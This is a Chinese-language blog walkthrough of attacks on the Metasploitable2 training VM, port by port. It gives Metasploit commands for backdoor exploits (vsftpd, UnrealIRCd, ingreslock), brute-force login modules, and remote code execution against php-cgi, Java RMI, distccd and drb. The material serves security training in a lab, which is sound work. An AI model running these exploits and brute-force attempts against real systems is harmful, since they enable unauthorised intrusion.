分享

Metasploit2靶场如何练习

 zZ华 2023-02-20 发布于广东

Metasploitable2靶机介绍:

Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 。适用于学习网络安全新手学习。

Metasploitable2靶机下载:

https://pan.baidu.com/s/1SE1xoRtXMsrj_34FJQXT2Q

Metasploitable2靶机安装:

下载好了把安装包解压 然后试用VMware即可。

图片

Metasploitable2靶机漏洞详解:

渗透机:kali IP :192.168.28.128  

靶机IP :192.168.28.141

图片

漏洞清单:

图片

21端口

search vsftpd
use 0
set rhosts 192.168.28.141
run

图片

22端口==直接暴力破解

Search ssh_login 搜索模块
Use auxiliary/scanner/ssh/ssh_login 使用模块
Set RHOST 192.168.28.141 设置目标地址
Set USER_FILE XXX 设置用户字典路径
Set PASS_FILE XXX 设置字典密码路径
Set THREADS 100 设置线程是100
Run

图片

图片

图片

23端口(telnet):

search telnet_login
use 1
Set RHOST 192.168.28.141 设置目标地址
Set USER_FILE XXX 设置用户字典路径
Set PASS_FILE XXX 设置字典密码路径
Set THREADS 100 设置线程是100
Run

图片

图片

80端口

图片

拿到站点进行渗透老套路====信息搜集啥的

图片

图片

search php-cgi
use 0
set rhost 192.168.28.141
run
background====将shell后置后台

图片

图片

139端口,445端口

这两个都是smb类型的,是共享服务,首选我们需要知道它的共享目录有哪些,枚举之后可看到一共发现有5个如下

search smb_eumn
0 auxiliary/scanner/smb/smb_enumshares
use 0
set rhost 192.168.28.141

图片

在使用一个脚本:use auxiliary/admin/smb/samba_symlink_traversal

图片

1099端口

一个Java反序列化命令执行漏洞,可以看到已经getshell

原理:Java RMI Server 的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致

search java rmi
4 exploit/multi/misc/java_rmi_server
use 4
set rhosts 192.168.28.141
run

图片

1524端口ingreslock

在少数服务器上存在一个古老的令人惊讶的“ingreslock”后门,监听1524端口。在过去的十年里,它经常被用于入侵一个暴露的服务器。它的利用是如此简单。

telnet 192.168.28.141 1524

图片

3306数据库默认端口

既然运行远程连接,直接爆破,账号root密码为空然后登入

使用模块:use auxiliary/scanner/mysql/mysql_login

search mysql_login
use 0
set username root

图片

图片

3632 distccd服务

远程命令执行漏洞,直接exp

使用模块:use exploit/unix/misc/distcc_exec

search distccd
use 0
set rhost 192.168.28.141

图片

后面几个利用教程就不详细展开了!!!

5432端口

postgresq爆破

5900端口vnc服务

vnc服务有两部分构成,一部分是服务,一个是客户端,我们进行爆破

使用模块爆破:use auxiliary/scanner/vnc/vnc_login

6667端口

6697 IRC服务, IRC服务这个版本存在后门漏洞,直接exp后getshell

使用模块:use exploit/unix/irc/unreal_ircd_3281_backdoor

8180端口

暴力破解账号密码:tomcat;tomcat

8787端口drb服务

有个远程代码执行漏洞

使用模块:use exploit/linux/misc/drb_remote_codeexec

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多